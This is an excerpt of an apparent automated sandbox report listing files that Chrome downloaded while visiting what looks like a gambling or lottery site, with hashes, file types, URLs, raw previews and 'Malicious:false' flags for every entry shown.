                                                                                                                                                          Preview:{"analyticsCode":"(function(a, b, c, d, e, j, s) { a[d] = a[d] || function() { (a[d].a = a[d].a || []).push(arguments) }; j = b.createElement(c), s = b.getElementsByTagName(c)[0]; j.async = true; j.charset = 'UTF-8'; j.src = 'https://static.meiqia.com/widget/loader.js'; s.parentNode.insertBefore(j, s); })(window, document, 'script', '_MEIQIA'); _MEIQIA('entId', 'c0f51ba154f1c0d141fccf42aa8b5791');","domainType":1,"agentCode":"101336017191","snType":1,"iconRel":"/fileupload/ll12/202312/202312180557505.png","paymentType":1,"h5AppLayerFlag":1,"zone":"","sn":"ll12","firstPageFlag":1,"forwardUrl":null,"isZone":false,"settings":{"videoProfitDayThreshold":300000,"agentBalanceControlFlat":0,"openUserFeeFlat":1,"openUserPointFlat":0,"lotteryProfitDayThreshold":"1000000","autoDrawAmount":500000,"openAutoDrawFlat":2,"regCaptchaType":"normal","captchaType":"normal","vipShowFlag":0,"smsLoginFlag":0,"thirdpartyTr
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):151324
                                                                                                                                                          Entropy (8bit):5.961896786964676
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:VD6KReWP4vtuGy4eSm0zapcJJUfyXx3O4/wLyrXk66RC0s:VD6KMKUuAFmwapcJJUfyXxeerXk6QC0s
                                                                                                                                                          MD5:CA7749BA7912EB65B729E869BB83ACD9
                                                                                                                                                          SHA1:4CE57A051731944EAD05072DCE1F47EAE7787170
                                                                                                                                                          SHA-256:DB3F625270BDB9B6EC85570C242CB9FE63D0ECBEBF003F5E043A5AFADD03BC96
                                                                                                                                                          SHA-512:05DB56552FFBF63C9D8D7061BFB13A7FD7A937BBC52BBA33C19DACBD47DB95A958B482FF47B696712F3915D49E7A4BFF4679E1508ED0ACB8A019E20D9413E8E4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/240516-03/static/js/vendor.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjLgTgDYBdAGgG8AiAagCYakqAuAMwFc0YAXAS3UzcyIMmgCU1dkhAACJNwBOvHlQDcANygKZCgLxpMVACJIArAAUqYsr32GALAQCOALyuYAhAAYxqhZgUAOnMyKgBlRV40AHMqSihuNk4efgNuCQUQbnYFNBleQQALXiQydIBfcrFy0JoAYQBZAhYOLj4BIRFxSWk5SJUNLR07YzNLa1sDKhRuUyYxT1xrFF1sEkCogBMQAA8AeVYyKF0PDxQAMnPcAHo8da3dg8xcMgBaHwAeLz8A4JoggBiACpMFAAD5gjxTABy0IUbgWKDE1ioAEEFAooABPOIUB77VhJNqpQQZLI5PJQAD8KECUAgEAANliiiUjgpouwALYgNDcJBiCFeZgFbjFUpCLScnl8pB3apVGq0ACiAGZmkSUh1hKIJNxArsICgFPyTlMwgAOOiM9ytLUGMnZXIyADsHl0ezAACsQDxAttWFEQOYFCgICATSyKEqoLjollNe0HRRMk68i7KmI6Yrag1uDQWskk4Idd0qFJZPIlANNNo9FMTBYrDYRi7ogANLzNlZTPYuACSTmbxymLr2uHmZCQIwwhQAElYfkFzP9AgAlUIhlBckogXGBtBQRnMxMk9IUWsyEC6KCs0q8YKhnfSCG0rfPkDWNC6Kh2pNUXRdG4LFwxQVgZG4PxyWdMUSkCMVeUwNAqT/ElulTCk5EwERuEwZF4MKRDUIER1MLQRVmCEZDiIMdDoLyJBsLKPCswQgwaLwigxVDYAZHI6pKIVapagALQaBBC2JbUugkS960MRk9jQCTfH1Q1jVNDjOl1PFWACUkyHUFBeE2GQvEA3RPwwmDVCQYBeG4GBCiQiQYCgXpcGYay8g4ui0wgwI3OPJjxHKVQ3N6OgvPomRfLIBRSJgwKj0ZEL4uqcL3NkVVov8uKFBsRK8n1ILUq6eLCsqbzYqLEkioC+k
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:GIF image data, version 89a, 1000 x 100
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):296227
                                                                                                                                                          Entropy (8bit):7.982756410644414
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:uw1hXRTabB+EVektektRPNViK7A/EiK7A/EiG:uudEbEEHPN7As7AQ
                                                                                                                                                          MD5:CE47548F8197B3AF694DB0C395D2FC81
                                                                                                                                                          SHA1:060F16029ABB13A10DC22D5C47E23F4C0BF48D9D
                                                                                                                                                          SHA-256:15960912C704E3AAABC90EC68F553E959B74C753120EBDF28C038CC43FC81D0D
                                                                                                                                                          SHA-512:D69204E7078E42D2AD86EB4CBB4892F0B74F50B08361CAE2473D75F317C15ACC1DD6467021EE86B81A28E30422CE4763F601F9E6A27819882D5D928EAE35713E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:GIF89a..d......Y....k...dX...m-........-.-.....Z..(.R'..z....U).....h.....:...., .&m.)..e...I.(..S..U.k......l....)....#....r.......2....,0.qB. "....e...A....M........p...s.(+....03.... "..4....Eg...xy.... ..|...K.. .03..k....roa...l...sl...I.(+..R..A....0...*[.,.f....d.....d.m.E.8 ..c.......N .C.O.F.......x...n.T.....U..'........B.....[..).....t..<.....D..W.O....6..Z..........SF....C....$&.&)....E:......0.......k.C.. .K....p......g.=.....[..{.,/.......O.Hu$... ...o....m..s..........j. ...F.........z;..c.*...c........-..b.....R.< .:2I=.z..*...e..]...0..<&...9....o..71#......l1*...i....$&..7..k..\...... ..i.....Z..w..m.A=.*...P.....:.A4..J@F...%..p..e..3..{..|.*-.-...3....48OF.....*-....69....48.$(.....Q..q..MY...4..M.0......."...............!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf=
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1920x455, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):90313
                                                                                                                                                          Entropy (8bit):7.8658936832137245
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:JXClWccvRT6xbZS4xV5XtFmFaBlZK04UXAFvlofvLVV+ACMGgsd6JhHwbjcLJfPW:JSlmRT6pk45mFaBlCveZV+AYgsd63HOl
                                                                                                                                                          MD5:386C1E733AED0C2705CEDEA85A9CFD7A
                                                                                                                                                          SHA1:8BD70B0F8FCEB858D8BCC36298CD487EAD9D943A
                                                                                                                                                          SHA-256:1D3999D6B86259C60D93343A4DFD3DFCD81CE5C24D86D4266E2810346E3164E2
                                                                                                                                                          SHA-512:D37CB233445B0A0336A48DD148380B7BC8C4E6F7405A7B9DAE2FCA85832A5553C746EFBD925357BCD7E3FB89982C4A53E8AC860D68D0A39733EFE87AC78FDDE7
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......<...../http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)" xmpMM:InstanceID="xmp.iid:AB91AE2C009711ECBCC2ADE1B32C179D" xmpMM:DocumentID="xmp.did:AB91AE2D009711ECBCC2ADE1B32C179D"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:AB91AE2A009711ECBCC2ADE1B32C179D" stRef:documentID="xmp.did:AB91AE2B009711ECBCC2ADE1B32C179D"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.............................................................................................................................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:GIF image data, version 89a, 1020 x 70
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):213703
                                                                                                                                                          Entropy (8bit):7.961452675287092
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:JTUJC20b2PtheqAhJDNOfU+eapJU+eapJU+0kVbjqMfgRMpbTTchzFpEl6LJqgjz:ugiFheqAhJ0UCUCUnkonOlTaz79Jhz
                                                                                                                                                          MD5:FAB3999B42FBE5C01E031D171AA0B90C
                                                                                                                                                          SHA1:E7F7941921F1D1B4867ECEA3ED67952A983E5C3F
                                                                                                                                                          SHA-256:A6A6911BD5946E5E93CD8FE3A20EAEC83D0B0F66908E98655A4C1C9F5723424A
                                                                                                                                                          SHA-512:62805B794B50EFCB8C3CE48A40E41F4B41A06E45ED15F78419DECD827DEEF1269C16EF9BD40AD162888FFCA50D0089B9EE91EBE195813E5E729B2731D8597662
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://www.image110.com/uploads/d88fe311d70531966d7d8cfbf0e4c955.gif
                                                                                                                                                          Preview:GIF89a..F.......Uo....,T....=.y...........E..Y......9i.........ww......rZhdb........x.....w...s.....o...Kx.........q.......f...........................Y..LH.......e.......U...z.....X..u..9a..5....n..k....m..........Iy.........K...........!............P.......fM;...%J............A.......Er...............u.............g..O}.Bm.3Oe..................t..i.............:..Tw..............C5+Y.....5m........}...........M............V................._..Z...........\...J.......e..D.........................j|.]......u....B.........A..._......A..L..N.........9.....~~}.................0.i(.8...7.....................................w......Ny....$k...............Q..........&.&,(..........!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164488, 2020/07/10-22:06:53 "> <rdf:RDF xmlns:rdf="ht
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 7899
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1404
                                                                                                                                                          Entropy (8bit):7.832290418196049
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:XpgFNEV4e+6WspJq030nnipPzMwCpfPWDyWlOzLFofXvSqwXMdCs4g/OX:XmFNEVFWs/q031xAwCNWGJLFonSCw3X
                                                                                                                                                          MD5:8ED7F53E3C4D7AFBBE4CDDCDFF920262
                                                                                                                                                          SHA1:9F7D5D268200DC26F4A658CFB135A51A98061780
                                                                                                                                                          SHA-256:78555A142760655FC81FFB96CEEBE5F57E24B0FA94A34B009145C364971AEE0A
                                                                                                                                                          SHA-512:5A29AB343B44CE11375B18745E413D352582F10F9FEFD1BE6238D2738059821B60C986E8E81995A6688F23D64C779B18873BA211E174E4DD7B3B8568510C0657
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://8vpfnx.eveday.me/061410/rcenter/common/js/gamebox/common/main.js
                                                                                                                                                          Preview:...........Ymo.6..-.......:....dk..qS...Zb$.4..T.;.....%..#c....{...y.H9.R.....<K.8.b.W.9....!.QB....$....W.....K.a1~.D.........O..u.........gg.pvO....+TW+.m.|..'2.+.'...<_.}..P...m(....(..i.5...........N.cG?}.p..N.Sg4.+!S.....W5gTK. .#g.%.0..41...S!..=...#.a.$V..6[....DI........lN_...g.Y..)V..h_K....|BI2.(....D........T......._...(.Dd..9..!.9.:q)G!N..%>......?'<.b....3.r4-...!#.c.o.HCV.B.P..$P.}..\. ..7..e......Bi..\.JaR..I...e.[...k....VX....l..T.-.`v...A.3" .[....nK..E.gd...&..8.T.mlp.....I.d.3...n..S..;..O...N..p'?/G...X.0,$.S..L.l...Q.^9.....*..z5.C...V..QzP*o...!mn.n*..M]......W..2.....5|tgS...W&.....lRO....;.....Ii'..h..|...(.>.cml...1..'.K..l.....QD....{l...g.m`....I.....`.3...E8)..E8!....Xg.:ji.3o.....].....K8.}....SU....W.....q.....98&..hY<K...O.A.y.s.....N...0sg.N..f.Wj]..Cu.=l@..h...+;#........2.....-.{ycg..<..G.~.5....-...g;#....IH...Z..bD.{qfg..<.....=y..<..D....R..X..p?}..s....hr..hr..c1..{vng........^.p?9..[....i|.R....$I.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):98
                                                                                                                                                          Entropy (8bit):4.580480016229387
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:yionv//thPlE+kSI+DthC9/kITQoWlED//jp:6v/lhPfkCDtETT9WlEDTp
                                                                                                                                                          MD5:73DF4484683667DA60643329AF7DBDD9
                                                                                                                                                          SHA1:9AE16E29D964C6A1ADE80D1A98FDAC225C8DC291
                                                                                                                                                          SHA-256:D5C956BFFB7565A9DF0E1B3C80AFBA091A617944474243FE8C90D606D75090EC
                                                                                                                                                          SHA-512:29C8C67E0412D06164C72BF9B15B0C24FA5EC1015F11EC57653AA7B28561FC5FCE7384302A8C7978D1C9E3AA88939AF3C64FC68AF38844AC4DC3E72D7E6C76C1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............%.V.....gAMA......a.....PLTE...........IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):28
                                                                                                                                                          Entropy (8bit):4.307354922057605
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:WZoS+Nhn:WZoSyh
                                                                                                                                                          MD5:A2432DC721D79CB02E73D270CE7E1EAA
                                                                                                                                                          SHA1:5A3C7BE77E9108ACA1B39E6BCD336EAAE6A51080
                                                                                                                                                          SHA-256:CE43C8C02C05A92B3E20FAB138AAD31B9FD54B92848913449D09924E839BB80E
                                                                                                                                                          SHA-512:0091B8D2F943169BDF1DD01D07A31F683F3B353D4EAADF1F7973AA79A989E349F53D6518AC612A856D89AB1539923C9FFAABB13E7CF8BEDF450E128342FF3298
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwmPhfUMg1ZimxIFDZFhlU4SBQ01hlQc?alt=proto
                                                                                                                                                          Preview:ChIKBw2RYZVOGgAKBw01hlQcGgA=
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 12 x 6, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):202
                                                                                                                                                          Entropy (8bit):6.414613869542594
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:yionv//thPl7l9klkxkmtF4NoMjj5x9S2tZo5qvfvYHVQ5dFMRPew9IWWHtxep71:6v/lhPJklTmtK+AxpnM2RHEp
                                                                                                                                                          MD5:007486169D51C75189D0C6471FDE7CDF
                                                                                                                                                          SHA1:476734AA0ABCE77DD3B95777CFE6A3E88A3EF531
                                                                                                                                                          SHA-256:12697A0297B80F6CF81A2DD4B78F3964F7BA541F207C95720821CE870B962115
                                                                                                                                                          SHA-512:981431307CB946C550511538EE55F56EF3B304F76081B737D31D028EA71F2AFE2D28C75B657BAF990EF70295BF5895C273C5FB0D73076CF064652B735376BEA5
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.....................IDAT(Sc.44nbdd0...c.;w~2`....\..1l...p..$.eh\...`....v...o.z@...c....p....u`.pM....L..0MZZZ<..;.30..)...k@........4...P4100 ..s..........s......8...-....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit colormap, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1743
                                                                                                                                                          Entropy (8bit):7.7304670350050895
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:DD2SPqDczsWJN0XDJJyrZGVcRzmL9KncaSQS55/m5spkAeUcYXYBZtErsCC/8nc:DqkqaswPZtRy8KSUkBfYCssF
                                                                                                                                                          MD5:ED36E9DF61A049966AB84918715677BA
                                                                                                                                                          SHA1:43CB1B6D46B443BE5EC43C89905463DA10C4899B
                                                                                                                                                          SHA-256:F7B8BA1773E9A27FDB56117B7E8527B2565568062450F985BD194130967C8BCC
                                                                                                                                                          SHA-512:E83627BD4C4E6A0E1C4ACDFE9FD0EE786C840E2B2228B0AC4BB234CCBC9709F2295E15CCD42D5F0B633566C2B80518ADA7B75FD8F8DF0028E75ACA64FFE44DDA
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-s/fish_tp-10.png
                                                                                                                                                          Preview:.PNG........IHDR...............^.....PLTE.....b.e.G-..8.*..X.Bk(..;..Z.^....cD.....h$"....='.......i.F..-.k.\.tMnF ;2.xb1........F.i).p(..i.....'k..{>...X3....9- .L.~.....[.{w8.e..uO%....].w_.....5..J"....x.c.rE..{.O........C.W...c...t7..6.A.<;.7.Y0(I.......b..[..T.....t.{*.q'..b..H..3.L.B.. /.......r..c........!......u..n..b..V..G..8..,..*.d).`....d.gI7.?..5#?,.B+@B'.>.2(..$............}..t..\.V.....r...........v..Y..A..[..?.g"....Ce..^.W..P/[IT.D"qC.;/.8.E8../..,..%..#.. rX.UQ.js....5.mI...y..>@.....P.....j..n.9...}..p..O.K....1...U..[..T..C.Y"..<..:.C..6..................|Z.{..w..t..e..c.QYTL.^JvgI.8............Y....{/..n....?e.[>....W..P.....G....M..5........g.~7..e.A..].......A{.....w.rp.m..h.1\g.V^.N..JG.?..>.6+.4.1.Z0`.+..*+\"...7s..y.L ...v...a.....?tRNS...............eE1.........pe.............................vaA=.F.....EIDAT(.b .0.ZH.*.I...aJ..+.M..tp...6y>A4Y.....J.G..R...,S.Y.....}...j.A./..:..Ym...>K.=#.N..4...}..\....e5P
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):18388
                                                                                                                                                          Entropy (8bit):4.351571195978757
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:sPrmmNeqmORafrtTThDeJ+GgJttHVENDYXdk0hfbwSr:0rmFORstThDeJtgJtFVENMXdkMBr
                                                                                                                                                          MD5:AB2CBE8957927CF9923F1435AA517BC8
                                                                                                                                                          SHA1:C1F5439091C7914EE2E65D8E9E4DC31A17327AEC
                                                                                                                                                          SHA-256:36BFC70E4B7D8EE7D2C3687C8F704AE2021A8F1F61FF31AD71C6227C602391D7
                                                                                                                                                          SHA-512:9A51747CC8D842CDF60CD433964529A5CBDD02E83D2972D8059B5935F7EF912757FF4461E757B5F662195F22A86B65F7969151BF9DAA303B5F55FF483C6C6266
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:{. "nnn": "outer-888",. "versions": {. "zb_m": "240606-01",. "zb_pc_member": "240529-01". },. "http": {. "CDN_PATHS": ["zb-qq.gzjqwlkj.com","zb1-hw.qectyoua.com","zb-hw.czwygs.com"],. "API_DOMAINS": ["ocsapi-lc.tingmeikj.com","ahd-ocssn.qqxgo.com","wssa-341.dalianjrkj.com:1585","ocsapi-aws.huayidm.com","wssa-381.moceand.com:1985"]. },. "https": {. "CDN_PATHS": ["zb-qq.gzjqwlkj.com","zb1-hw.qectyoua.com","zb-hw.czwygs.com"],. "API_DOMAINS": ["ocsapi-lc.tingmeikj.com","ahd-ocssn.qqxgo.com","wssa-341.dalianjrkj.com:1586","ocsapi-aws.huayidm.com","wssa-381.moceand.com:1986"]. },. "public_domain": ["cppublbyv2-ali.epie3d.com", "cppublbyv2-hw.zjbxxy.com", "cppublbyv2-ty.huliancc.com"],. "gb_app_ins_domains": ["appiso-ty.souzhanzx.com:1066", "appiso-ty.zvbzjsb.com:8066"],. "gb_plist_api_domains": ["qpplist.lcyj888.com"],. "gb_wx_proxy": "https://wy-ali.meriksenrusso.com",. "gb_disabled_proxy": true,. "gb_is_pc_sp
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:GIF image data, version 89a, 1000 x 100
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):65795
                                                                                                                                                          Entropy (8bit):7.913738062766826
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:dOtzhvMTCF0xLWsPC+bKyK2APweyYpMSEY1vuK0ThR8AghBr:S1vMW05WsqqK+tfYpJT12K03UHr
                                                                                                                                                          MD5:BB64FAFEDA33E8F4AD20FE3101A2FA66
                                                                                                                                                          SHA1:2AD9955C30F6811D898E7F0E28D95F52E0BC2350
                                                                                                                                                          SHA-256:175047DA21FDB5388E2DE5DB967CE5AE9D419524ADEA40D192000F94C7054726
                                                                                                                                                          SHA-512:498F5AB489CD84363444A69F0664F3C7E168F73CF8CA96FD081781E6E8F4919CE10B82548945694389EFE533B8704C0AAB21DFC1D8DC01E212500F4D1B1B9A8C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://www.image110.com/uploads/94b22146fe6859b39e2c8cd7b28f3134.gif
                                                                                                                                                          Preview:GIF89a..d....z...........v...*Hs........(..3.........Bo......W...Nk...].....!b....Gr........ N|...8..]{....#..7..:f....,v....Lj..Yf\........-Z..........HVww..l......Ky-......>j...[..Y......../...Gs>k.Cn.....;gn........:......P..Jw....Do.!P}S~.$S.7c....;..*W.4`.~..'..1_.....An.?l...Dq......3A..gs.......(9^<........Mz..Mz....Eb\0T.a.9e....+Y.o}..=j.8Wg...JwT......<XAm....`........R}....(U.5a..-T.....2Bf...Ny.>..............Wu.xLpUb.............e...$@...(.............an.........4......Es}.....q..)..'...7d......p.........._.....Ju.$Q....1]....d..E..N.....<.....Qv.1T{......P{.J`.Ae.z.....h.....9........?_.v.....`..Ko...............Ei.>Ln...Xx.!..l..............<c.5X.7\.W|.Ot./Nu.Fp.<i.Hv.8e=i.'T.@l..Dp.LzMx.+X.<h.8d.It.0\.Pp........Ek....h<`*Rz Ku.%N.9f.........!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="h
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (2900), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2900
                                                                                                                                                          Entropy (8bit):5.909546745936024
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:Vot+MVxTXG2d2UQhQjusxKnQ0yS8d7fKfVUE9RYEslQ8g63HiqyxkyxcO5Byrsj2:Va+WHXaQlBdOdpvYpSjsHiqGuO5Byrsy
                                                                                                                                                          MD5:A7671296EB644518A91CBEE23F77ADF5
                                                                                                                                                          SHA1:E3D1B7ACD9C67290EA19010268D9D0D38079AFD3
                                                                                                                                                          SHA-256:D570A937D513129ED7010D4A2043932567D4E9CC35E9C439609D7C3895BCAA9E
                                                                                                                                                          SHA-512:6CA4433072595DEDB5411FC9510BEDECFEE66E560277C91E83DBA73259BE3227524D49541604773C2F58CFEEE3544F424E046063677367361D337F2A54546A01
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/367/headerTip.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtALATgGYBdAGgG8ATANwBcBpALgDMBXNGWgS3U1tJCkuASnIAiVkhAACJLQBOXTmIDcAeTAArEJwB0lEMy5oQABXkoIIebQCemQWID6TkEgCyKSqwA2IMRTUUD6sIIwAhAAMAL7CKkHysgC8XJhikTAQzGLCpGhJ5GhQALZhYtwQSAAyXHIBlFC0UCzsnDxomKLyILSs8mjkMJRopo0AFoxI+oZQvrS6AMLoclBo80NoABIockLFAOYAqgBKVZPTzLM+80toK2u6G9tyANRiAPRcxVD7IAC0EBg7xQtDG1neYhewGMlBQwF0AGV6ABJABybwhpAq1VqtEY5GiWK+1kYaF8PlIhwRAFFuKVGGIAl99gAhKBSRjYMQ+Vb7JwQABeATEzB5+zEZBgKHYtBJkVIUpl1gAKsT5KTyUTSsqQAAPPFiQDoyoAauUAb6aAF9SxNFCaVQV4kPjmaNQS0ONxePwQF0en00GIxrRaBAxElQ/MkKwwHJ5Jh5bhhAB+PGg2qPYbOsYYr4/f6AiEvFNTZlsqTYEDEDGQ2iEqS0JZK9VsN3tPgCUQJaRcJLuca6UUoFAx3AARgAVD3Qbp5KtYcVOsIXn8AEyRFSFx7StbWJLrxVb+QvLhYsapvey+QAPloADJr3wT1Mz9vaLld5vzwAeEC3++n9/br1rVIYp/0oV02l4URCRgbpGhAMCmwgjp2ygRJaB3B8BCSaE0FheEkTRFRUjEYcAEFNHFYQ0l0fMQCzXC9V0TQkByXRQRADpEPdDovXIeYABITH1VV4EwLiW1EeZsRqOQkhAXQwSgAx5DYrhKhk2h4lQzsd1U9TcT7LhrmsMTWm41teO6Xp+nKYkQzDNjbCsWI8iSbBiBUeS6RAHV9R/KTiV89CvMCvUXyxPScTkPtB2pWAxlM5sPVELhmDSbyxHCBy7CsW95h8XFkVlYoUMSEBdIKuQipAYpDO
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 25 x 26, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1545
                                                                                                                                                          Entropy (8bit):7.117957482446824
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:w1hfvWwjx82lY2T3JVFaUyJ3VDA2GKtcZmcO8c7AD+zWLaYom4eU:OANn2NOJ3dXOHO8c71zWO+4l
                                                                                                                                                          MD5:1168DA354E0C658EA9088C37BB2311AF
                                                                                                                                                          SHA1:3E05E74F30E98AE5033754795D4D9877706BD26B
                                                                                                                                                          SHA-256:607825C41FD77E5C4229E2A42267C8D9F59FEE416D35EA0A0BDA7888B2E5DE71
                                                                                                                                                          SHA-512:119FCFB75754C0504334D72780537319D7C440687883B1D52F86CDE5D2A8314E4DFC770A9D2F05D57EC4BBA97212249AEAD83AA9667910C84CB5D5AA7C604AB7
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............B}......tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:5BD30C4650A211E794CFD2438EE3747C" xmpMM:DocumentID="xmp.did:5BD30C4750A211E794CFD2438EE3747C"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:5BD30C4450A211E794CFD2438EE3747C" stRef:documentID="xmp.did:5BD30C4550A211E794CFD2438EE3747C"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..4....yIDATx..Oh.p...i.4.b..N/..]6D.... .x..(..d7.Q..AA\wS.!..EA..Qq.z.."u..SOMYl...R.4I.<..........H.gO.&
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 28 x 28, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):977
                                                                                                                                                          Entropy (8bit):7.685400115476764
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:g2/6iLvWeEYrhnIAcwCDz+Ou3+PU5jvgLYchb4WQlZuks4va:g2/6659nIAcwCDlu3+PmEYlTuh4i
                                                                                                                                                          MD5:9A397CF9B75A152DD157684098CAB8C7
                                                                                                                                                          SHA1:6F0FF7B505BBEBD58734FC8C8F1335DCFF463715
